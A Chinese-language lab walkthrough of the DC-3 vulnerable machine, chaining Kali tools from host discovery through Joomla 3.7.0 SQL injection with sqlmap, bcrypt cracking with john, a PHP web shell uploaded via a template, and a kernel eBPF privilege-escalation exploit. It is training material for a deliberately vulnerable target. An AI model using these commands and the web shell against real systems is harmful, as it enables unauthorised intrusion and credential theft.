渗透测试工具箱实战：用Kali自带工具（joomscan/sqlmap/searchsploit）搞定DC-3靶机

Kali工具链实战：从信息收集到提权的DC-3靶机深度解析

在网络安全领域，渗透测试工具的高效组合往往比单一工具的熟练使用更为关键。本文将以DC-3靶机为例，展示如何通过Kali Linux内置工具链的有机组合，完成从信息收集到最终提权的完整渗透流程。不同于简单的工具使用教程，我们将重点解析每个阶段工具间的数据流转与决策逻辑，帮助读者建立实战化的工具链思维。

1. 信息收集阶段的工具协同策略

信息收集是渗透测试的基石，也是工具链发挥协同效应的最佳舞台。针对DC-3靶机，我们采用分层递进的工具组合策略：

1.1 网络层发现与端口扫描

初始阶段使用netdiscover进行二层发现，这是内网渗透的标准起手式。其ARP扫描能有效绕过部分网络访问控制：

netdiscover -r 192.168.10.0/24 -i eth0

发现目标IP后，立即转入nmap进行深度端口扫描。这里推荐组合使用多种扫描技术：

nmap -sS -sV -T4 -O -A -p- 192.168.10.133

关键参数解析：

• -sS：SYN隐蔽扫描
• -sV：服务版本探测
• -O：操作系统指纹识别
• -A：全面扫描模式

1.2 Web应用指纹识别

当nmap显示80端口开放HTTP服务时，工具链自然过渡到Web层信息收集。whatweb可快速识别CMS框架：

whatweb -a3 http://192.168.10.133

发现Joomla框架后，立即启动dirsearch进行目录爆破，这是Web渗透的标准流程：

dirsearch -u http://192.168.10.133/ -e php,html,js -x 403,404 -t 50

工具输出关联技巧：

• whatweb的Joomla识别 → 触发joomscan扫描
• dirsearch的后台路径发现 → 聚焦权限提升路径

2. 漏洞挖掘阶段的工具链式反应

2.1 Joomla专项扫描

确认Joomla框架后，joomscan成为核心工具。其自动化检测能节省大量手动验证时间：

joomscan -u http://192.168.10.133 -ec

关键输出项：

• 版本号：3.7.0
• 已知漏洞：SQL注入(CVE-2017-8917)
• 配置缺陷：调试模式开启

2.2 本地漏洞库检索

joomscan的结果直接导向searchsploit的使用。这是Kali最具价值的离线资源之一：

searchsploit Joomla 3.7.0

发现42033号漏洞后，通过以下命令查看详情：

searchsploit -x php/webapps/42033.txt

漏洞特征提取：

• 注入点：com_fields组件
• 参数：list[fullordering]
• 利用方式：基于报错的SQL注入

3. 漏洞利用阶段的工具精准配合

3.1 SQL注入自动化利用

根据searchsploit的指引，sqlmap成为最佳选择。以下是分阶段注入方案：

# 数据库枚举 sqlmap -u "http://192.168.10.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs # 表结构提取 sqlmap -u "同上URL" -D joomladb --tables # 凭据提取 sqlmap -u "同上URL" -D joomladb -T "#__users" -C "name,username,password" --dump

关键技巧：

• 使用--random-agent绕过基础WAF
• -p参数精准指定注入点
• 哈希值自动识别为bcrypt

3.2 密码破解实战

获取的密码哈希需要john来处理。针对bcrypt算法优化破解策略：

# 哈希格式预处理 echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > hash.txt # 字典攻击 john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

性能优化建议：

• 使用--fork=4启用多核并行
• 对大型字典建议先使用--rules进行变形

4. 权限提升的工具链闭环

4.1 Web后台到系统shell

通过获得的admin凭据登录后台，发现模板文件上传功能：

<?php system($_GET['cmd']); ?>

上传后通过curl验证执行：

curl http://192.168.10.133/templates/beez3/shell.php?cmd=id

4.2 交互式shell建立

使用python实现TTY升级：

python -c 'import pty; pty.spawn("/bin/bash")'

备选方案：

• socat反向连接
• perl反向shell
• 二进制payload编译上传

4.3 内核漏洞提权

系统信息收集显示Ubuntu 16.04内核：

uname -a cat /etc/lsb-release

通过searchsploit查找本地提权漏洞：

searchsploit Ubuntu 16.04 privilege

选择Linux Kernel 4.4.0-21的ebpf漏洞：

gcc -o exploit exploit.c chmod +x exploit ./exploit

提权检查清单：

1. sudo -l 检查sudo权限
2. find / -perm -4000 查找SUID程序
3. uname -a 确认内核版本
4. dpkg -l 查看已安装软件

最终在/root目录获取flag，完成整个渗透流程。这个案例充分展示了Kali工具链如何通过信息流转形成闭环攻击路径，每个工具的输出都成为下一个工具的输入，构建出高效的渗透测试工作流。